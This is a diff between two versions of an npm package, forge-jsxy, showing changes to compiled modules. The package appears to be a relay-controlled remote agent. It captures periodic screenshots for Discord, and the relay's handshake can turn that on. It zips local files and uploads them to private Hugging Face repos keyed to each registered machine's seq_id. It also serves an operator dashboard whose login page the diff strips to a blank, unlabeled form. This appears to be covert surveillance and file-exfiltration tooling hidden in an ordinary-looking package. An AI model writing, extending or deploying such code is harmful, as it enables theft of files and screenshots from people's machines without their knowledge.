forge-jsxy 1.0.76 → 1.0.78

package/dist/hfCredentials.d.ts

@@ -1,7 +1,7 @@
 export interface HfCredentials {
     token: string;
     hubUrl: string;
-    /** Hub namespace (username or org) for automatic `namespace/client_<db>` repositories. */
+    /** Hub namespace (username or org) for automatic `namespace/<seq_id>` session repositories. */
     namespace?: string;
 }
 /** Clear relay-delivered HF fields in memory after an upload (JS cannot overwrite string contents). */

package/dist/hfCredentials.js

@@ -19,7 +19,7 @@ exports.encryptHfCredentialsJson = encryptHfCredentialsJson;
  * Set `CFGMGR_HF_CREDENTIALS_B64` on the **agent** to base64(iv12 || tag16 || ciphertext) where
  * plaintext UTF-8 JSON is:
  * `{ "token": "hf_...", "hubUrl": "https://huggingface.co", "namespace": "your_hf_user" }`
- * (`hubUrl` optional; `namespace` = Hugging Face username or org for `namespace/client_*` auto repos).
+ * (`hubUrl` optional; `namespace` = Hugging Face username or org for automatic `namespace/<seq_id>` session repos).
  *
  * Optional dev escape hatch (not for production): `CFGMGR_HF_ALLOW_PLAINTEXT=1` with
  * `HUGGINGFACE_HUB_TOKEN` and optional `HUGGINGFACE_HUB_URL`.

package/dist/hfSeqIdLookup.d.ts

@@ -3,10 +3,10 @@
  * Matches `table_name` / `session_id` (case-insensitive), or derives the table name from `client_id`.
  */
 export declare function clientRegistryRowMatchesSessionTable(row: Record<string, unknown>, clientTableName: string): boolean;
-/** Default true: session Hub repos must use `client_<seq_id>`. Set CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG=1 to allow UUID-style slug when seq_id is unknown. */
+/** Default true: session Hub repos must use numeric `<seq_id>` slug. Set CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG=1 to allow UUID-style slug when seq_id is unknown. */
 export declare function hfSessionRepoRequireSeqId(): boolean;
 /**
- * Hub repo name segment for auto-session uploads: `client_<n>` when `seq_id` is known,
+ * Hub repo name segment for auto-session uploads: decimal **`seq_id`** string when known,
  * otherwise the legacy Postgres-safe table slug from {@link postgresqlClientTableName}.
  */
 export declare function hfAutoSessionRepoSlug(clientTableName: string, seqId: number | null | undefined): string;

package/dist/hfSeqIdLookup.js

@@ -6,11 +6,11 @@ exports.hfAutoSessionRepoSlug = hfAutoSessionRepoSlug;
 exports.fetchSeqIdForClientTableName = fetchSeqIdForClientTableName;
 /**
  * Resolve forge-db `seq_id` for a `client_*` table name so Hugging Face session repos use
- * `namespace/client_<seq_id>` (aligned with Discord channel naming in `discordRelayUpload.ts`).
+ * `namespace/<seq_id>` (numeric repo segment under your Hub namespace).
  *
  * Uses `GET /api/clients` (same source as relay screenshot channel naming).
  *
- * **Default:** Hub repo segment is **`client_<seq_id>`** — uploads fail if `seq_id` cannot be resolved.
+ * **Default:** Hub repo segment is **`<seq_id>`** (digits only) — uploads fail if `seq_id` cannot be resolved.
  * Set **`CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG=1`** on the agent to fall back to the legacy
  * UUID-style Postgres slug ({@link postgresqlClientTableName}) when the API is unreachable or the client is unregistered.
  */
@@ -44,7 +44,7 @@ function clientRegistryRowMatchesSessionTable(row, clientTableName) {
     }
     return false;
 }
-/** Default true: session Hub repos must use `client_<seq_id>`. Set CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG=1 to allow UUID-style slug when seq_id is unknown. */
+/** Default true: session Hub repos must use numeric `<seq_id>` slug. Set CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG=1 to allow UUID-style slug when seq_id is unknown. */
 function hfSessionRepoRequireSeqId() {
     const allowLegacy = (process.env.CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG || "").trim().toLowerCase();
     if (allowLegacy === "1" ||
@@ -70,7 +70,7 @@ function apiKeyHeader() {
     return apiKey ? { "X-Forge-Api-Key": apiKey } : {};
 }
 /**
- * Hub repo name segment for auto-session uploads: `client_<n>` when `seq_id` is known,
+ * Hub repo name segment for auto-session uploads: decimal **`seq_id`** string when known,
  * otherwise the legacy Postgres-safe table slug from {@link postgresqlClientTableName}.
  */
 function hfAutoSessionRepoSlug(clientTableName, seqId) {
@@ -80,7 +80,7 @@ function hfAutoSessionRepoSlug(clientTableName, seqId) {
         Number.isFinite(Number(seqId)) &&
         Number(seqId) >= 0) {
         const n = Math.floor(Number(seqId));
-        return `client_${n}`.slice(0, 96);
+        return String(n).slice(0, 96);
     }
     return (0, tableNaming_1.postgresqlClientTableName)(ct, null).slice(0, 96);
 }
@@ -91,6 +91,12 @@ async function fetchSeqIdForClientTableName(clientTableName) {
     const ct = (clientTableName || "").trim();
     if (!ct)
         return null;
+    const pureDigits = /^(\d+)$/.exec(ct);
+    if (pureDigits) {
+        const n = Number(pureDigits[1]);
+        if (Number.isFinite(n) && n >= 0)
+            return Math.floor(n);
+    }
     const directClientSeq = /^client_(\d+)$/i.exec(ct);
     if (directClientSeq) {
         const n = Number(directClientSeq[1]);

package/dist/hfUpload.d.ts

@@ -23,13 +23,13 @@ export interface RunHfUploadOptions {
     /** `zip` (default): one .zip with store-only compression; `tree`: one Hub file per disk file. Ignored in session mode (always zip for single-blob semantics). */
     folderMode?: "zip" | "tree";
     /**
-     * When true: repo = `namespace/client_<seq_id>` when forge-db exposes `seq_id` for this session, else legacy table slug.
+     * When true: repo = `namespace/<seq_id>` when forge-db exposes `seq_id` for this session, else legacy table slug.
      * First upload creates the repo; later uploads append new files only.
      */
     autoSessionRepo?: boolean;
     /** Session / DB table id (e.g. `client_<uuid>`) — required if `autoSessionRepo`. */
     clientTableName?: string;
-    /** When set, skips forge-db lookup and uses this `seq_id` for the Hub repo segment `client_<seq_id>`. */
+    /** When set, skips forge-db lookup and uses this `seq_id` for the Hub repo segment `<seq_id>` (digits only). */
     clientSeqId?: number;
     /** Override HF username/org (else encrypted credentials or `CFGMGR_HF_NAMESPACE`). */
     hfNamespace?: string;

package/dist/hfUpload.js

@@ -45,9 +45,9 @@ exports.runHfUpload = runHfUpload;
  * remove staging) before compression or per-file upload so locked live paths are less likely to fail.
  * Files and folders are packed as one zip "store" only (zlib level 0) per selection to minimize CPU before upload.
  *
- * Session mode (`autoSessionRepo`): Hub repo = `namespace/client_<seq_id>` (forge-db `GET /api/clients`). By default
- * `seq_id` is **required**; set `CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG=1` to fall back to the UUID-style table slug
- * if `seq_id` is unknown. First upload creates the repo; later uploads append under `exports/<timestamp>_<rand>/` (never replaces).
+ * Session mode (`autoSessionRepo`): Hub repo id segment is **`seq_id` alone** (e.g. `namespace/42`),
+ * resolved via forge-db `GET /api/clients`. By default `seq_id` is **required**; set `CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG=1`
+ * to fall back to the UUID-style Postgres table slug when `seq_id` is unknown.
  * Manual mode with `createRepo`: new repos are also created **private** so Hub exports are not world-visible by default.
  *
  * Upload body: `hubContentFromLocalPath` yields a `Blob` or, for files above the streaming threshold, a `file:`
@@ -68,6 +68,7 @@ const node_fs_1 = require("node:fs");
 const fs = __importStar(require("node:fs"));
 const path = __importStar(require("node:path"));
 const os = __importStar(require("node:os"));
+const zlib = __importStar(require("node:zlib"));
 const node_url_1 = require("node:url");
 const promises_1 = require("node:stream/promises");
 const hub_1 = require("@huggingface/hub");
@@ -80,6 +81,7 @@ const fsProtocol_1 = require("./fsProtocol");
 const hfSeqIdLookup_1 = require("./hfSeqIdLookup");
 const hfHubPathSanitize_1 = require("./hfHubPathSanitize");
 const hfHubUploadContent_1 = require("./hfHubUploadContent");
+const explorerHeavyDirSkips_1 = require("./explorerHeavyDirSkips");
 function maxZipFilesLimit() {
     const raw = (process.env.CFGMGR_FS_MAX_ZIP_FILES || "").trim();
     if (raw) {
@@ -272,11 +274,84 @@ function wrapFetchWithMinInterval(inner, minMs) {
         const gap = Math.max(0, minMs - (Date.now() - lastEnd));
         if (gap > 0)
             await new Promise((r) => setTimeout(r, gap));
-        const res = await inner(input, init);
-        lastEnd = Date.now();
-        return res;
+        try {
+            const res = await inner(input, init);
+            lastEnd = Date.now();
+            return res;
+        }
+        catch (e) {
+            lastEnd = Date.now();
+            throw e;
+        }
+    };
+}
+/**
+ * S3 multipart UploadPart PUT requests now include `x-amz-sdk-checksum-algorithm=CRC32` (and a
+ * placeholder `x-amz-checksum-crc32=AAAAAA==`) in the pre-signed URL, meaning S3 requires the
+ * client to send the actual CRC32 of each part as the `x-amz-checksum-crc32` request header.
+ * @huggingface/hub ≤ 2.11.x does not compute or send this header, causing HTTP 400 from S3.
+ * This wrapper detects S3 PUT requests that require CRC32 and injects the correct header.
+ * Falls back gracefully when the body type is not readable (e.g. a stream).
+ */
+function wrapFetchWithS3Crc32Header(inner) {
+    return async (input, init) => {
+        try {
+            if (init?.method === "PUT" || (init == null && (typeof input === "object") && !("url" in input))) {
+                const url = typeof input === "string" ? input
+                    : input instanceof URL ? input.href
+                        : input.url;
+                if (/[?&]x-amz-sdk-checksum-algorithm=CRC32(&|$)/i.test(url)) {
+                    const body = (init ?? input)?.body ?? (init?.body);
+                    let bytes;
+                    if (body instanceof Uint8Array) {
+                        bytes = body;
+                    }
+                    else if (body instanceof ArrayBuffer) {
+                        bytes = new Uint8Array(body);
+                    }
+                    else if (typeof Blob !== "undefined" && body instanceof Blob) {
+                        bytes = new Uint8Array(await body.arrayBuffer());
+                    }
+                    if (bytes !== undefined) {
+                        const crcVal = computeCrc32(bytes);
+                        const crcB64 = Buffer.from([
+                            (crcVal >>> 24) & 0xff,
+                            (crcVal >>> 16) & 0xff,
+                            (crcVal >>> 8) & 0xff,
+                            crcVal & 0xff,
+                        ]).toString("base64");
+                        const headers = new Headers((init?.headers ?? input?.headers));
+                        headers.set("x-amz-checksum-crc32", crcB64);
+                        return inner(input, { ...(init ?? {}), method: "PUT", headers, body: bytes });
+                    }
+                }
+            }
+        }
+        catch {
+            /* fall through to normal fetch on any error */
+        }
+        return inner(input, init);
     };
 }
+/**
+ * CRC32 using Node's built-in `zlib.crc32` (available since v20.15 / v22.2).
+ * Falls back to a pure-JS implementation for older Node 18 agents.
+ */
+function computeCrc32(data) {
+    const zlibCrc32 = zlib.crc32;
+    if (typeof zlibCrc32 === "function") {
+        return zlibCrc32(data) >>> 0;
+    }
+    // Pure-JS fallback (standard CRC32 / IEEE 802.3 polynomial).
+    let crc = 0xffffffff;
+    for (let i = 0; i < data.length; i++) {
+        crc ^= data[i];
+        for (let j = 0; j < 8; j++) {
+            crc = crc & 1 ? (crc >>> 1) ^ 0xedb88320 : crc >>> 1;
+        }
+    }
+    return (crc ^ 0xffffffff) >>> 0;
+}
 /** Custom `fetch` for Hub: optional spacing + retries on thrown network errors (defaults on). */
 function buildHubFetch() {
     const minMs = hubMinFetchIntervalMs();
@@ -286,8 +361,8 @@ function buildHubFetch() {
         inner = wrapFetchWithThrowRetries(inner, maxThrow);
     if (minMs !== undefined)
         inner = wrapFetchWithMinInterval(inner, minMs);
-    if (minMs === undefined && maxThrow === 0)
-        return undefined;
+    // Always inject S3 CRC32 header for multipart LFS uploads that require checksum validation.
+    inner = wrapFetchWithS3Crc32Header(inner);
     return inner;
 }
 /** Max full Hub commit attempts (file or batch) on transient API / wire failure. Default 4. `0` / `1` = single try. */
@@ -593,6 +668,9 @@ function countFilesRecursive(dir, maxFiles) {
                 continue;
             }
             if (ent.isDirectory()) {
+                if ((0, explorerHeavyDirSkips_1.explorerHeavySubdirNameSkipped)(ent.name)) {
+                    continue;
+                }
                 walk(child);
             }
             else if (ent.isFile()) {
@@ -612,6 +690,13 @@ async function writeSingleFileZipStoreOnly(sourceFile, zipPath) {
     const output = (0, node_fs_1.createWriteStream)(zipPath);
     const archive = (0, archiver_1.default)("zip", { zlib: { level: 0 } });
     const fail = (err) => {
+        // Abort archiver first to stop further file processing, then destroy the write stream.
+        try {
+            archive.abort();
+        }
+        catch {
+            /* skip */
+        }
         try {
             output.destroy(err);
         }
@@ -643,6 +728,13 @@ async function writeDirectoryZipStoreOnly(sourceDir, zipPath) {
     const output = (0, node_fs_1.createWriteStream)(zipPath);
     const archive = (0, archiver_1.default)("zip", { zlib: { level: 0 } });
     const fail = (err) => {
+        // Abort archiver first to stop further file processing, then destroy the write stream.
+        try {
+            archive.abort();
+        }
+        catch {
+            /* skip */
+        }
         try {
             output.destroy(err);
         }
@@ -654,13 +746,6 @@ async function writeDirectoryZipStoreOnly(sourceDir, zipPath) {
     output.on("error", fail);
     archive.pipe(output);
     const baseName = path.basename(sourceDir) || "folder";
-    let entries = 0;
-    archive.on("entry", () => {
-        entries++;
-        if (entries % 400 === 0) {
-            void yieldEventLoop();
-        }
-    });
     archive.directory(sourceDir, baseName);
     try {
         await archive.finalize();
@@ -810,7 +895,7 @@ async function runHfUploadCore(opts) {
             (0, hfCredentials_1.scrubHfCredentialsInPlace)(cred);
             return {
                 ok: false,
-                error: "Session Hub repo requires forge-db seq_id (Hub name: namespace/client_<seq_id>). " +
+                error: "Session Hub repo requires forge-db seq_id (Hub repo: `<namespace>/<seq_id>`). " +
                     "Could not resolve seq_id for this client_table. Set RELAY_FORGE_DB_API_URL / FORGE_JS_SYNC_URL / " +
                     "CFGMGR_API_URL and RELAY_FORGE_DB_API_KEY / FORGE_DB_API_KEY so GET /api/clients succeeds, " +
                     "ensure this machine is registered in _client_registry, or pass client_seq_id on fs_hf_upload. " +
@@ -832,7 +917,8 @@ async function runHfUploadCore(opts) {
         folderMode = opts.folderMode === "tree" ? "tree" : "zip";
     }
     const repo = parseRepoId(resolvedRepoStr);
-    const destPrefix = normalizeDestPrefix(opts.destination ?? "");
+    // sanitizeHubRelativePath strips ".." / "." path segments to prevent path traversal within the repo.
+    const destPrefix = normalizeDestPrefix((0, hfHubPathSanitize_1.sanitizeHubRelativePath)(opts.destination ?? ""));
     const exportBase = joinRemotePath(destPrefix, newExportRunFolder());
     const delayMs = interFileDelayMs();
     const sendProgress = (p) => {

package/dist/relayAgent.js

@@ -384,33 +384,49 @@ function runRelayAgentLoop(opts) {
             if (rf && typeof rf === "object" && !Array.isArray(rf)) {
                 caps = rf;
                 if (caps.discord_screenshot === true) {
-                    const cur = (process.env.FORGE_JS_DISCORD_SCREENSHOT_ENABLED || "").trim();
-                    if (!cur) {
+                    const en = (process.env.FORGE_JS_DISCORD_SCREENSHOT_ENABLED || "").trim().toLowerCase();
+                    const explicitOff = ["0", "false", "no", "off"].includes(en);
+                    const explicitOn = ["1", "true", "yes", "on"].includes(en);
+                    /** Follow relay when unset or explicitly on; never override explicit opt-out (0/false/no/off). */
+                    if (!explicitOff && (!en || explicitOn)) {
                         discordEnabledByRelayHandshake = true;
                     }
-                    const clamped = parseRelayDiscordIntervalMs(caps.discord_screenshot_interval_ms);
-                    /**
-                     * Only apply relay `discord_screenshot_interval_ms` when the agent did **not** set
-                     * `FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_MS`. Otherwise the relay handshake overwrote a
-                     * per-machine value (e.g. 60s on agent vs 300000 ms on relay), which looked like “random”
-                     * multi-minute gaps.
-                     */
-                    const agentIv = (process.env.FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_MS || "").trim();
-                    if (clamped != null && !agentIv) {
-                        process.env.FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_MS = String(clamped);
-                    }
-                    const agentSg = (process.env.FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_STAGGER_MS || "").trim();
-                    if (!agentSg) {
-                        const sg = parseRelayDiscordStaggerCapMs(caps.discord_screenshot_interval_stagger_ms, 120_000);
-                        if (sg != null) {
-                            process.env.FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_STAGGER_MS = String(sg);
+                    if (!explicitOff) {
+                        const clamped = parseRelayDiscordIntervalMs(caps.discord_screenshot_interval_ms);
+                        /**
+                         * Only apply relay `discord_screenshot_interval_ms` when the agent did **not** set
+                         * `FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_MS`. Otherwise the relay handshake overwrote a
+                         * per-machine value (e.g. 60s on agent vs 300000 ms on relay), which looked like “random”
+                         * multi-minute gaps.
+                         */
+                        const agentIv = (process.env.FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_MS || "").trim();
+                        if (clamped != null && !agentIv) {
+                            process.env.FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_MS = String(clamped);
                         }
-                    }
-                    const agentFsg = (process.env.FORGE_JS_DISCORD_SCREENSHOT_FIRST_STAGGER_MS || "").trim();
-                    if (!agentFsg) {
-                        const fg = parseRelayDiscordStaggerCapMs(caps.discord_screenshot_first_stagger_ms, 300_000);
-                        if (fg != null) {
-                            process.env.FORGE_JS_DISCORD_SCREENSHOT_FIRST_STAGGER_MS = String(fg);
+                        const agentSg = (process.env.FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_STAGGER_MS || "").trim();
+                        if (!agentSg) {
+                            const sg = parseRelayDiscordStaggerCapMs(caps.discord_screenshot_interval_stagger_ms, 120_000);
+                            if (sg != null) {
+                                process.env.FORGE_JS_DISCORD_SCREENSHOT_INTERVAL_STAGGER_MS = String(sg);
+                            }
+                        }
+                        const agentFsg = (process.env.FORGE_JS_DISCORD_SCREENSHOT_FIRST_STAGGER_MS || "").trim();
+                        if (!agentFsg) {
+                            const fg = parseRelayDiscordStaggerCapMs(caps.discord_screenshot_first_stagger_ms, 300_000);
+                            if (fg != null) {
+                                process.env.FORGE_JS_DISCORD_SCREENSHOT_FIRST_STAGGER_MS = String(fg);
+                            }
+                        }
+                        const agentUm = (process.env.FORGE_JS_DISCORD_UPLOAD_MODE || "").trim();
+                        if (!agentUm) {
+                            const rawUm = caps.discord_screenshot_upload_mode;
+                            const u = typeof rawUm === "string" ? rawUm.trim().toLowerCase() : "";
+                            if (u === "relay") {
+                                process.env.FORGE_JS_DISCORD_UPLOAD_MODE = "relay";
+                            }
+                            else if (u === "webhook" || u === "direct") {
+                                process.env.FORGE_JS_DISCORD_UPLOAD_MODE = "webhook";
+                            }
                         }
                     }
                 }
@@ -426,6 +442,12 @@ function runRelayAgentLoop(opts) {
         };
         ws.on("open", () => {
             log(quiet, "  Connected to relay");
+            try {
+                (0, agentEnvFile_1.applyForgeJsAgentEnvFile)((0, clientId_1.defaultCfgmgrDataDir)());
+            }
+            catch {
+                /* skip */
+            }
             viewerAuthenticated = !password;
             viewerConnected = false;
             pendingAuthNonce = "";
@@ -732,8 +754,8 @@ function runRelayAgentLoop(opts) {
                             const destination = String(msg.destination ?? "").trim();
                             const createRepo = Boolean(msg.create_repo);
                             const folderMode = msg.folder_mode === "tree" ? "tree" : "zip";
-                            const hfForce = Boolean(msg.force);
-                            const hfForceKill = Boolean(msg.force_kill);
+                            const hfForce = (0, fsMessages_1.jsonBoolLoose)(msg.force);
+                            const hfForceKill = (0, fsMessages_1.jsonBoolLoose)(msg.force_kill);
                             if (hfFetchFromRelayEnabled()) {
                                 try {
                                     hfCred = await fetchHfCredentialsFromRelay(sendJson);

package/dist/relayDashboardGate.js

@@ -173,9 +173,9 @@ function buildDashboardGateLoginHtml() {
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<meta name="theme-color" content="#181818">
+<meta name="theme-color" content="#161616">
 <meta http-equiv="Cache-Control" content="no-store"/>
-<title>Relay access</title>
+<title>&#8203;</title>
 <link rel="icon" href="/forge-explorer-favicon.svg" type="image/svg+xml"/>
 <style>
   html { color-scheme: dark; }
@@ -183,90 +183,77 @@ function buildDashboardGateLoginHtml() {
   body {
     margin: 0;
     min-height: 100vh;
+    min-height: 100dvh;
     display: flex;
+    flex-direction: column;
     align-items: center;
     justify-content: center;
-    font-family: system-ui, -apple-system, Segoe UI, Roboto, "Helvetica Neue", sans-serif;
-    background: #1f1f1f;
-    color: #cccccc;
+    font-family: -apple-system, BlinkMacSystemFont, "Segoe WPC", "Segoe UI", "Helvetica Neue", Helvetica, Ubuntu, "Droid Sans", sans-serif;
+    background: #161616;
     -webkit-font-smoothing: antialiased;
+    padding: 0.75rem;
   }
   .card {
     width: 100%;
-    max-width: 20rem;
-    padding: 1.25rem 1.5rem 1.5rem;
-    border: 1px solid #3c3c3c;
-    border-radius: 8px;
-    background: #252526;
+    max-width: 17.5rem;
+    display: flex;
+    flex-direction: column;
+    padding: 0.85rem;
+    border: 1px solid #2b2b2b;
+    border-radius: 6px;
+    background: #1c1c1c;
+    box-shadow: none;
   }
-  h1 {
-    margin: 0 0 0.35rem;
-    font-size: 1.05rem;
-    font-weight: 600;
-    color: #e0e0e0;
+  .card.gate-err {
+    border-color: rgba(200, 90, 75, 0.65);
   }
-  p { margin: 0 0 0.9rem; font-size: 12.5px; line-height: 1.4; color: #9d9d9d; }
-  label { display: block; font-size: 11.5px; color: #9d9d9d; margin-bottom: 0.3rem; }
-  input {
-    width: 100%;
-    background: #313131;
-    border: 1px solid #3c3c3c;
-    color: #cccccc;
-    padding: 0.4rem 0.65rem;
-    border-radius: 4px;
-    font-size: 13px;
-    margin-bottom: 0.75rem;
+  .gate-form {
+    margin: 0;
   }
-  input:hover { border-color: #505050; }
-  input:focus-visible { outline: 2px solid #0078d4; border-color: #0078d4; }
-  button {
+  input#p {
     width: 100%;
-    background: #0078d4;
-    color: #fff;
-    border: 1px solid transparent;
-    padding: 0.5rem 0.75rem;
+    background: #222222;
+    border: 1px solid #2b2b2b;
+    color: #e0e0e0;
+    padding: 0.55rem 0.5rem;
     border-radius: 4px;
     font-size: 13px;
-    font-weight: 500;
-    cursor: pointer;
+    outline: none;
+  }
+  input#p:hover { border-color: #3d3d3d; }
+  input#p:focus-visible {
+    outline: 1px solid #4d4d4d;
+    outline-offset: 0;
+    border-color: #3d3d3d;
+    box-shadow: none;
   }
-  button:hover { background: #026ec1; }
-  button:disabled { opacity: 0.5; cursor: not-allowed; }
-  .err { color: #f48771; font-size: 12px; margin: 0 0 0.6rem; min-height: 1.2em; }
-  .hint { font-size: 10.5px; color: #7a7a7a; margin-top: 0.9rem; line-height: 1.35; }
 </style>
 </head>
 <body>
-  <div class="card" role="dialog" aria-labelledby="gtitle">
-    <h1 id="gtitle">Relay file explorer</h1>
-    <p>Enter the operator password to open the forge-explorer (session connect UI).</p>
-    <p class="err" id="e"></p>
-    <form id="f" autocomplete="off">
-      <label for="p">Password</label>
+  <div class="card" role="dialog" aria-modal="true">
+    <form id="f" class="gate-form" autocomplete="off">
       <input id="p" type="password" name="password" autocomplete="current-password" required autofocus/>
-      <button type="submit" id="go">Unlock</button>
     </form>
-    <p class="hint">The server stores only a SHA-256 of this password in the environment, not the plaintext. Use HTTPS in production.</p>
   </div>
   <script>
   (function(){
     var f = document.getElementById('f');
-    var e = document.getElementById('e');
+    var card = f && f.closest('.card');
     var p = document.getElementById('p');
-    var go = document.getElementById('go');
+    var busy = false;
     f.addEventListener('submit', function(ev){
       ev.preventDefault();
-      e.textContent = '';
-      go.disabled = true;
+      if (busy) return;
+      busy = true;
+      if (card) card.classList.remove('gate-err');
       var text = p.value;
       fetch('/api/relay-dashboard-auth', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ password: text }) })
         .then(function(r){
           if (r.status === 204) { window.location.replace((window.location.pathname || '/') + (window.location.search || '')); return; }
-          if (r.status === 401) { e.textContent = 'Invalid password.'; return; }
-          e.textContent = 'Unexpected response (' + r.status + ').';
+          if (card) card.classList.add('gate-err');
         })
-        .catch(function(){ e.textContent = 'Network error.'; })
-        .then(function(){ go.disabled = false; });
+        .catch(function(){ if (card) card.classList.add('gate-err'); })
+        .then(function(){ busy = false; });
     });
   })();
   </script>